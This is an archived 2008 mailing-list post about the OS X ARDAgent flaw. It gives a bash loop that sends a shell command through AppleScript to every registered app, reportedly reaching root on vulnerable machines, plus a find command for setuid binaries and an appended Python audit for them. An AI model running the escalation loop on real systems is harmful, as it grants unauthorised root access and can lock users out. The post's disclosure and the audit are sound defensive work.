0x90.org

[XSO] Archives? Re : ARDAgent scripting escalation flaw

Gammah Radiation gammah at gmail.com
Mon Jun 23 15:20:09 EDT 2008

I was looking for a way to "tell app"s to do stuff, and came up with
this: Beware this may lock you out of your machine so make sure you
have ssh running or something...

This is a bash loop:

for x in `/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump |
          grep identifier |
          sed -e 's/.*identifier:  *\(.*\)(.*).*/\1/' |
          sort -u` ; do
    ( echo "App ID:" $x ; osascript -e 'tell app id "'${x}'" to do shell script "id"' ; ) >> osascript.log
done

Looks like doing tell app id com.apple.LockScreen to do shell script
id will lock your OS X UI out with the nice giant padlock icon that
they use in screen sharing to lock out the local user. This loop got
uid 0 via ARDAgent on a box still vuln to the ARDAgent issue. It did
not find a second one.

I started out looking for setuid binaries at paths matching
Myapp.app/Contents/Macos/Myapp -- there seemed to be none that were
setuid iirc -- there were a few setgid tho. That search was done like
so:

find / -type d -regex '.*\.app' -print0 -exec find {} -perm -4000 -o -perm -2000 \;

In my testing, I have not yet been able to get a setgid procview
process run from any of the setgid binaries (with this stupid
AppleScript stuff).
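As an added defensive check, not part of the original post, the following Python audit generalizes the find command above: it walks a directory tree for .app bundles, reports setuid/setgid regular files under Contents/MacOS together with the owner uid, and pairs each with the CFBundleIdentifier from Info.plist so a finding can be matched against the "App ID" values the loop logs. The Fake.app bundle, the org.example.fake identifier and the temporary tree are constructed fixtures.

```python
import os
import plistlib
import stat
import tempfile

def privileged_bits(mode: int) -> list:
    """Names of the setuid/setgid bits set in a file mode (empty if neither)."""
    return [n for b, n in ((stat.S_ISUID, "setuid"), (stat.S_ISGID, "setgid")) if mode & b]

def bundle_identifier(app_dir: str):
    """CFBundleIdentifier from Contents/Info.plist, or None if unreadable."""
    try:
        with open(os.path.join(app_dir, "Contents", "Info.plist"), "rb") as fh:
            return plistlib.load(fh).get("CFBundleIdentifier")
    except (OSError, plistlib.InvalidFileException, ValueError):
        return None

def audit_bundles(root: str) -> list:
    """Report setuid/setgid regular files in every <name>.app/Contents/MacOS under root."""
    findings = []
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:
            if not name.endswith(".app"):
                continue
            app_dir = os.path.join(dirpath, name)
            macos_dir = os.path.join(app_dir, "Contents", "MacOS")
            if not os.path.isdir(macos_dir):
                continue
            for exe in sorted(os.listdir(macos_dir)):
                path = os.path.join(macos_dir, exe)
                st = os.lstat(path)  # lstat: never follow symlinks out of the bundle
                bits = privileged_bits(st.st_mode)
                if stat.S_ISREG(st.st_mode) and bits:
                    # bundle_id is what `tell app id` addresses; uid 0 plus setuid is the escalation case
                    findings.append({"bundle_id": bundle_identifier(app_dir), "path": path,
                                     "bits": bits, "uid": st.st_uid})
    return findings

def build_sample_tree() -> str:
    """Constructed fixture (not a real system): one fake bundle with a setuid executable."""
    root = tempfile.mkdtemp()
    contents = os.path.join(root, "Applications", "Fake.app", "Contents")
    os.makedirs(os.path.join(contents, "MacOS"))
    with open(os.path.join(contents, "Info.plist"), "wb") as fh:
        plistlib.dump({"CFBundleIdentifier": "org.example.fake"}, fh)
    exe = os.path.join(contents, "MacOS", "Fake")
    open(exe, "w").close()
    os.chmod(exe, 0o4755)  # the setuid bit the find command above (-perm -4000) looks for
    return root
```

Running audit_bundles("/Applications") on a real system lists every bundle whose main executable carries either bit, which is the set worth reviewing for scriptable privileged behaviour.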
